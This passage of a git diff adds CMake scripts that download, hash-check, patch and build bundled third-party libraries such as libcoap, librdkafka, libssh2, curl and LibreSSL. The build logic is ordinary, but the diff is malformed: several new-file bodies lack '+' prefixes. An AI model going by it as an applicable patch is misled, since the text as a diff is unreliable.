    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libarchive/libarchive.patch")

    # Define byproducts
    if (WIN32)
        set(BYPRODUCT "lib/libarchive.lib")
    else()
        set(BYPRODUCT "lib/libarchive.a")
    endif()

    # Set build options
    set(LIBARCHIVE_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libarchive-install"
            -DENABLE_NETTLE=FALSE
            -DENABLE_OPENSSL=FALSE
            -DENABLE_TAR=FALSE
            -DENABLE_CPIO=FALSE
            -DENABLE_TEST=FALSE)

    # Build project
    ExternalProject_Add(
            libarchive-external
            URL "https://www.libarchive.org/downloads/libarchive-3.3.2.tar.gz"
            URL_HASH "SHA256=ed2dbd6954792b2c054ccf8ec4b330a54b85904a80cef477a1c74643ddafa0ce"
            # Fixed: unpack into the binary tree (was "${SOURCE_DIR}/..."), so
            # the source tree stays read-only, consistent with the other
            # bundled libraries in cmake/.
            SOURCE_DIR "${BINARY_DIR}/thirdparty/libarchive-src"
            CMAKE_ARGS ${LIBARCHIVE_CMAKE_ARGS}
            PATCH_COMMAND ${PC}
            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libarchive-install/${BYPRODUCT}"
            EXCLUDE_FROM_ALL TRUE
    )

    # Set variables
    set(LIBARCHIVE_FOUND "YES" CACHE STRING "" FORCE)
    set(LIBARCHIVE_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libarchive-install/include" CACHE STRING "" FORCE)
    set(LIBARCHIVE_LIBRARY "${BINARY_DIR}/thirdparty/libarchive-install/${BYPRODUCT}" CACHE STRING "" FORCE)
    set(LIBARCHIVE_LIBRARIES ${LIBARCHIVE_LIBRARY} CACHE STRING "" FORCE)

    # Create imported targets
    add_library(libarchive STATIC IMPORTED)
    set_target_properties(libarchive PROPERTIES IMPORTED_LOCATION "${LIBARCHIVE_LIBRARY}")
    add_dependencies(libarchive libarchive-external)
    file(MAKE_DIRECTORY ${LIBARCHIVE_INCLUDE_DIR})
    set_property(TARGET libarchive APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBARCHIVE_INCLUDE_DIR})
endfunction(use_bundled_libarchive)
diff --git a/cmake/BundledLibCOAP.cmake b/cmake/BundledLibCOAP.cmake
new file mode 100644
index 0000000..7d52d5a
--- /dev/null
+++ b/cmake/BundledLibCOAP.cmake
@@ -0,0 +1,62 @@
+#
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+#
+
function(use_bundled_libcoap SOURCE_DIR BINARY_DIR)
    # Builds the bundled libcoap (autotools, in-source) and exposes it as the
    # imported target COAP::libcoap.
    message("Using bundled libcoap")

    set(COAP_INSTALL_DIR "${BINARY_DIR}/thirdparty/libcoap-install")

    # Platform-specific name of the static archive
    if (WIN32)
        set(COAP_BYPRODUCT "lib/libcoap-2.lib")
    else()
        set(COAP_BYPRODUCT "lib/libcoap-2.a")
    endif()

    # libcoap uses autotools: configuration runs in the patch step, the build
    # is in-source, and "make install" stages everything into COAP_INSTALL_DIR.
    ExternalProject_Add(
            coap-external
            GIT_REPOSITORY "https://github.com/obgm/libcoap.git"
            GIT_TAG "v4.2.0-rc2"
            BUILD_IN_SOURCE true
            SOURCE_DIR "${BINARY_DIR}/thirdparty/libcoap-src"
            BUILD_COMMAND make
            CMAKE_COMMAND ""
            UPDATE_COMMAND ""
            INSTALL_COMMAND make install
            BUILD_BYPRODUCTS "${COAP_INSTALL_DIR}/${COAP_BYPRODUCT}"
            CONFIGURE_COMMAND ""
            PATCH_COMMAND ./autogen.sh && ./configure --disable-examples --disable-dtls --disable-tests --disable-documentation --prefix=${COAP_INSTALL_DIR}
            STEP_TARGETS build
            EXCLUDE_FROM_ALL TRUE
    )

    # Export result variables
    set(COAP_FOUND "YES" CACHE STRING "" FORCE)
    set(COAP_INCLUDE_DIRS "${COAP_INSTALL_DIR}/include" CACHE STRING "" FORCE)
    set(COAP_LIBRARY "${COAP_INSTALL_DIR}/${COAP_BYPRODUCT}" CACHE STRING "" FORCE)
    set(COAP_LIBRARIES "${COAP_LIBRARY}" CACHE STRING "" FORCE)

    # Imported target wrapping the static archive
    file(MAKE_DIRECTORY ${COAP_INCLUDE_DIRS})
    add_library(COAP::libcoap STATIC IMPORTED)
    set_target_properties(COAP::libcoap PROPERTIES IMPORTED_LOCATION "${COAP_LIBRARY}")
    add_dependencies(COAP::libcoap coap-external)
    set_property(TARGET COAP::libcoap APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES "${COAP_INCLUDE_DIRS}")
    set_property(TARGET COAP::libcoap APPEND PROPERTY INTERFACE_COMPILE_DEFINITIONS "WITH_POSIX=1")
endfunction(use_bundled_libcoap)
diff --git a/cmake/BundledLibRdKafka.cmake b/cmake/BundledLibRdKafka.cmake
new file mode 100644
index 0000000..b83420a
--- /dev/null
+++ b/cmake/BundledLibRdKafka.cmake
@@ -0,0 +1,73 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_librdkafka SOURCE_DIR BINARY_DIR)
    # Builds the bundled librdkafka 1.0.1 (static, SSL on, SASL/zstd off) and
    # exposes it as the imported target "librdkafka".

    # Patch allowing the build against LibreSSL
    set(PATCH_CMD "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/librdkafka/librdkafka-libressl.patch")

    # Platform-specific name of the static archive
    if(WIN32)
        set(LIBRDKAFKA_BYPRODUCT "lib/rdkafka.lib")
    else()
        set(LIBRDKAFKA_BYPRODUCT "lib/librdkafka.a")
    endif()

    set(LIBRDKAFKA_INSTALL_DIR "${BINARY_DIR}/thirdparty/librdkafka-install")

    # Build options forwarded to the external CMake build
    set(LIBRDKAFKA_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            "-DCMAKE_INSTALL_PREFIX=${LIBRDKAFKA_INSTALL_DIR}"
            "-DWITH_SSL=ON"
            "-DWITH_SASL=OFF"
            "-DRDKAFKA_BUILD_STATIC=ON"
            "-DRDKAFKA_BUILD_EXAMPLES=OFF"
            "-DRDKAFKA_BUILD_TESTS=OFF"
            "-DENABLE_LZ4_EXT=OFF"
            "-DWITH_ZSTD=OFF"
            "-DCMAKE_INSTALL_LIBDIR=lib"
            "-DLIBRDKAFKA_STATICLIB=1")

    append_third_party_passthrough_args(LIBRDKAFKA_CMAKE_ARGS "${LIBRDKAFKA_CMAKE_ARGS}")

    # Download, patch, build and install via ExternalProject
    ExternalProject_Add(
            kafka-external
            URL "https://github.com/edenhill/librdkafka/archive/v1.0.1.tar.gz"
            URL_HASH "SHA256=b2a2defa77c0ef8c508739022a197886e0644bd7bf6179de1b68bdffb02b3550"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${LIBRDKAFKA_CMAKE_ARGS}
            PATCH_COMMAND ${PATCH_CMD}
            BUILD_BYPRODUCTS "${LIBRDKAFKA_INSTALL_DIR}/${LIBRDKAFKA_BYPRODUCT}"
            EXCLUDE_FROM_ALL TRUE
    )

    # The external build links against OpenSSL and zlib
    add_dependencies(kafka-external OpenSSL::SSL OpenSSL::Crypto ZLIB::ZLIB)

    # Export result variables
    set(LIBRDKAFKA_FOUND "YES" CACHE STRING "" FORCE)
    set(LIBRDKAFKA_INCLUDE_DIR "${LIBRDKAFKA_INSTALL_DIR}/include/librdkafka" CACHE STRING "" FORCE)
    set(LIBRDKAFKA_LIBRARY "${LIBRDKAFKA_INSTALL_DIR}/${LIBRDKAFKA_BYPRODUCT}" CACHE STRING "" FORCE)
    set(LIBRDKAFKA_LIBRARIES ${LIBRDKAFKA_LIBRARY} CACHE STRING "" FORCE)

    # Imported target wrapping the static archive
    file(MAKE_DIRECTORY ${LIBRDKAFKA_INCLUDE_DIR})
    add_library(librdkafka STATIC IMPORTED)
    set_target_properties(librdkafka PROPERTIES IMPORTED_LOCATION "${LIBRDKAFKA_LIBRARY}")
    add_dependencies(librdkafka kafka-external)
    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto ZLIB::ZLIB)
    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBRDKAFKA_INCLUDE_DIR})
    set_property(TARGET librdkafka APPEND PROPERTY INTERFACE_COMPILE_DEFINITIONS "LIBRDKAFKA_STATICLIB=1")
endfunction(use_bundled_librdkafka)
\ No newline at end of file
diff --git a/cmake/BundledLibSSH2.cmake b/cmake/BundledLibSSH2.cmake
new file mode 100644
index 0000000..f78aff1
--- /dev/null
+++ b/cmake/BundledLibSSH2.cmake
@@ -0,0 +1,79 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
function(use_bundled_libssh2 SOURCE_DIR BINARY_DIR)
    # Builds the bundled libssh2 1.8.2 (OpenSSL backend, zlib compression on)
    # and exposes it as the imported target "libssh2".
    message("Using bundled libssh2")

    # Patch fixing the project's CMAKE_MODULE_PATH handling
    set(PATCH_CMD "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libssh2/libssh2-CMAKE_MODULE_PATH.patch")

    # On lib64-style UNIX installs the archive lands in lib64/ instead of lib/
    set(LIBSUFFIX "")
    get_property(USES_LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
    if (NOT WIN32 AND NOT APPLE AND "${USES_LIB64}" STREQUAL "TRUE")
        set(LIBSUFFIX 64)
    endif()

    # Platform-specific name of the static archive
    if (WIN32)
        set(LIBSSH2_BYPRODUCT "lib/libssh2.lib")
    else()
        set(LIBSSH2_BYPRODUCT "lib${LIBSUFFIX}/libssh2.a")
    endif()

    # Build options forwarded to the external CMake build
    set(LIBSSH2_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libssh2-install"
            -DENABLE_ZLIB_COMPRESSION=ON
            -DCRYPTO_BACKEND=OpenSSL
            -DBUILD_TESTING=OFF
            -DBUILD_EXAMPLES=OFF)

    append_third_party_passthrough_args(LIBSSH2_CMAKE_ARGS "${LIBSSH2_CMAKE_ARGS}")

    # Download, patch, build and install via ExternalProject
    ExternalProject_Add(
            libssh2-external
            URL "https://www.libssh2.org/download/libssh2-1.8.2.tar.gz"
            URL_HASH "SHA256=088307d9f6b6c4b8c13f34602e8ff65d21c2dc4d55284dfe15d502c4ee190d67"
            SOURCE_DIR "${BINARY_DIR}/thirdparty/libssh2-src"
            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
            CMAKE_ARGS ${LIBSSH2_CMAKE_ARGS}
            PATCH_COMMAND ${PATCH_CMD}
            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libssh2-install/${LIBSSH2_BYPRODUCT}"
            EXCLUDE_FROM_ALL TRUE
    )

    # The external build links against OpenSSL's crypto library and zlib
    add_dependencies(libssh2-external OpenSSL::Crypto ZLIB::ZLIB)

    # Export result variables
    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
    set(LIBSSH2_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libssh2-install/include" CACHE STRING "" FORCE)
    set(LIBSSH2_LIBRARY "${BINARY_DIR}/thirdparty/libssh2-install/${LIBSSH2_BYPRODUCT}" CACHE STRING "" FORCE)

    # Make the results visible to nested third-party builds via FindPackage.cmake
    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_LIBSSH2_INCLUDE_DIR=${LIBSSH2_INCLUDE_DIR}" CACHE STRING "" FORCE)
    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_LIBSSH2_LIBRARY=${LIBSSH2_LIBRARY}" CACHE STRING "" FORCE)

    # Imported target wrapping the static archive
    file(MAKE_DIRECTORY ${LIBSSH2_INCLUDE_DIR})
    add_library(libssh2 STATIC IMPORTED)
    set_target_properties(libssh2 PROPERTIES IMPORTED_LOCATION "${LIBSSH2_LIBRARY}")
    add_dependencies(libssh2 libssh2-external)
    set_property(TARGET libssh2 APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto ZLIB::ZLIB)
    set_property(TARGET libssh2 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBSSH2_INCLUDE_DIR})
endfunction(use_bundled_libssh2)
diff --git a/cmake/BundledLibUvc.cmake b/cmake/BundledLibUvc.cmake
new file mode 100644
index 0000000..e9b2043
--- /dev/null
+++ b/cmake/BundledLibUvc.cmake
@@ -0,0 +1,60 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_libuvc SOURCE_DIR BINARY_DIR)
+    find_package(PkgConfig REQUIRED)
+    pkg_check_modules(LIBUSB REQUIRED libusb-1.0)
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libuvc/libuvc.patch")
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/${CMAKE_LIBRARY_ARCHITECTURE}/libuvc.lib")
+    else()
+        set(BYPRODUCT "lib/${CMAKE_LIBRARY_ARCHITECTURE}/libuvc.a")
+    endif()
+
+    # Set build options
+    set(LIBUVC_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libuvc-install")
+
+    # Build project
+    ExternalProject_Add(
+            libuvc-external
+            GIT_REPOSITORY "https://github.com/libuvc/libuvc.git"
+            GIT_TAG "v0.0.6"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/libuvc-src"
+            CMAKE_ARGS ${LIBUVC_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libuvc-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(LIBUVC_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBUVC_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libuvc-install/include" CACHE STRING "" FORCE)
+    set(LIBUVC_LIBRARY "${BINARY_DIR}/thirdparty/libuvc-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(LIBUVC_LIBRARIES ${LIBUVC_LIBRARY} CACHE STRING "" FORCE)
+
+    add_library(libuvc STATIC IMPORTED)
+    set_target_properties(libuvc PROPERTIES IMPORTED_LOCATION "${LIBUVC_LIBRARY}")
+    add_dependencies(libuvc libuvc-external)
+    file(MAKE_DIRECTORY ${LIBUVC_INCLUDE_DIR})
+    set_property(TARGET libuvc APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBUVC_INCLUDE_DIR})
+    set_property(TARGET libuvc APPEND PROPERTY INTERFACE_LINK_LIBRARIES ${LIBUSB_LIBRARIES})
+endfunction(use_bundled_libuvc)
diff --git a/cmake/BundledLibcURL.cmake b/cmake/BundledLibcURL.cmake
new file mode 100644
index 0000000..1917d98
--- /dev/null
+++ b/cmake/BundledLibcURL.cmake
@@ -0,0 +1,106 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_curl SOURCE_DIR BINARY_DIR)
+    # Define patch step (PC must be a list so PATCH_COMMAND is passed as a separate keyword argument)
+    if (WIN32)
+        set(PC PATCH_COMMAND ./buildconf.bat)
+    endif()
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/libcurl.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/libcurl.a")
+    endif()
+
+    # Set build options
+    set(CURL_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/curl-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
+            -DBUILD_CURL_EXE=OFF
+            -DBUILD_TESTING=OFF
+            -DBUILD_SHARED_LIBS=OFF
+            -DHTTP_ONLY=ON
+            -DCURL_DISABLE_CRYPTO_AUTH=ON
+            -DCURL_CA_PATH=none
+            -DCMAKE_USE_LIBSSH2=OFF
+            -DCMAKE_DEBUG_POSTFIX=
+            -DHAVE_GLIBC_STRERROR_R=1
+            -DHAVE_GLIBC_STRERROR_R__TRYRUN_OUTPUT=""
+            -DHAVE_POSIX_STRERROR_R=0
+            -DHAVE_POSIX_STRERROR_R__TRYRUN_OUTPUT=""
+            -DHAVE_POLL_FINE_EXITCODE=0
+            -DHAVE_FSETXATTR_5=0
+            -DHAVE_FSETXATTR_5__TRYRUN_OUTPUT=""
+            )
+    if (OPENSSL_OFF)
+        list(APPEND CURL_CMAKE_ARGS -DCMAKE_USE_OPENSSL=OFF)
+    else()
+        list(APPEND CURL_CMAKE_ARGS -DCMAKE_USE_OPENSSL=ON)
+    endif()
+
+    append_third_party_passthrough_args(CURL_CMAKE_ARGS "${CURL_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            curl-external
+            URL "https://curl.haxx.se/download/curl-7.64.0.tar.gz"
+            URL_HASH "SHA256=cb90d2eb74d4e358c1ed1489f8e3af96b50ea4374ad71f143fa4595e998d81b5"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/curl-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${CURL_CMAKE_ARGS}
+            ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/curl-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    add_dependencies(curl-external ZLIB::ZLIB)
+    if (NOT OPENSSL_OFF)
+        add_dependencies(curl-external OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    # Set variables
+    set(CURL_FOUND "YES" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIR "${BINARY_DIR}/thirdparty/curl-install/include" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIRS "${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARY "${BINARY_DIR}/thirdparty/curl-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARIES "${CURL_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CURL_INCLUDE_DIR=${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CURL_LIBRARY=${CURL_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${CURL_INCLUDE_DIRS})
+
+    add_library(CURL::libcurl STATIC IMPORTED)
+    set_target_properties(CURL::libcurl PROPERTIES IMPORTED_LOCATION "${CURL_LIBRARY}")
+    add_dependencies(CURL::libcurl curl-external)
+    set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${CURL_INCLUDE_DIRS})
+    set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_LINK_LIBRARIES ZLIB::ZLIB)
+    if (NOT OPENSSL_OFF)
+        set_property(TARGET CURL::libcurl APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+endfunction(use_bundled_curl)
diff --git a/cmake/BundledLibreSSL.cmake b/cmake/BundledLibreSSL.cmake
new file mode 100644
index 0000000..6c52684
--- /dev/null
+++ b/cmake/BundledLibreSSL.cmake
@@ -0,0 +1,100 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_libre_ssl SOURCE_DIR BINARY_DIR)
+    message("Using bundled LibreSSL")
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT_PREFIX "" CACHE STRING "" FORCE)
+        set(BYPRODUCT_SUFFIX ".lib" CACHE STRING "" FORCE)
+    else()
+        set(BYPRODUCT_PREFIX "lib" CACHE STRING "" FORCE)
+        set(BYPRODUCT_SUFFIX ".a" CACHE STRING "" FORCE)
+    endif()
+
+    set(BYPRODUCTS
+            "lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}"
+            "lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}"
+            "lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}"
+            )
+
+    set(LIBRESSL_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install" CACHE STRING "" FORCE)
+
+    foreach(BYPRODUCT ${BYPRODUCTS})
+        list(APPEND LIBRESSL_LIBRARIES_LIST "${LIBRESSL_BIN_DIR}/${BYPRODUCT}")
+    endforeach()
+
+    # Set build options
+    set(LIBRESSL_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${LIBRESSL_BIN_DIR}"
+            -DLIBRESSL_APPS=OFF
+            -DLIBRESSL_TESTS=OFF
+            )
+
+    # Build project
+    ExternalProject_Add(
+        libressl-portable
+        URL https://cdn.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://gentoo.osuosl.org/distfiles/libressl-2.8.3.tar.gz
+        URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
+        SOURCE_DIR "${BINARY_DIR}/thirdparty/libressl-src"
+        CMAKE_ARGS ${LIBRESSL_CMAKE_ARGS}
+        BUILD_BYPRODUCTS ${LIBRESSL_LIBRARIES_LIST}
+        EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
+    set(OPENSSL_INCLUDE_DIR "${LIBRESSL_BIN_DIR}/include" CACHE STRING "" FORCE)
+    set(OPENSSL_LIBRARIES ${LIBRESSL_LIBRARIES_LIST} CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_INCLUDE_DIR=${OPENSSL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    string(REPLACE ";" "%" OPENSSL_LIBRARIES_EXPORT "${OPENSSL_LIBRARIES}")
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_LIBRARIES=${OPENSSL_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_CRYPTO_LIBRARY=${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_OPENSSL_SSL_LIBRARY=${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${OPENSSL_INCLUDE_DIR})
+
+    add_library(OpenSSL::Crypto STATIC IMPORTED)
+    set_target_properties(OpenSSL::Crypto PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(OpenSSL::Crypto PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}")
+    add_dependencies(OpenSSL::Crypto libressl-portable)
+
+    add_library(OpenSSL::SSL STATIC IMPORTED)
+    set_target_properties(OpenSSL::SSL PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(OpenSSL::SSL PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}")
+    add_dependencies(OpenSSL::SSL libressl-portable)
+    set_property(TARGET OpenSSL::SSL APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto)
+
+    add_library(LibreSSL::TLS STATIC IMPORTED)
+    set_target_properties(LibreSSL::TLS PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+    set_target_properties(LibreSSL::TLS PROPERTIES
+            IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+            IMPORTED_LOCATION "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}")
+    add_dependencies(LibreSSL::TLS libressl-portable)
+    set_property(TARGET LibreSSL::TLS APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::Crypto)
+endfunction(use_libre_ssl)
diff --git a/cmake/BundledMbedTLS.cmake b/cmake/BundledMbedTLS.cmake
index 9407aed..aa1b239 100644
--- a/cmake/BundledMbedTLS.cmake
+++ b/cmake/BundledMbedTLS.cmake
@@ -66,12 +66,12 @@
     set(MBEDCRYPTO_LIBRARY "${MBEDTLS_BIN_DIR}/lib/${BYPRODUCT_PREFIX}mbedcrypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
 
     # Set exported variables for FindPackage.cmake
-    set(EXPORTED_MBEDTLS_INCLUDE_DIRS "${MBEDTLS_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_INCLUDE_DIRS=${MBEDTLS_INCLUDE_DIRS}" CACHE STRING "" FORCE)
     string(REPLACE ";" "%" MBEDTLS_LIBRARIES_EXPORT "${MBEDTLS_LIBRARIES}")
-    set(EXPORTED_MBEDTLS_LIBRARIES "${MBEDTLS_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
-    set(EXPORTED_MBEDTLS_LIBRARY "${MBEDTLS_LIBRARY}" CACHE STRING "" FORCE)
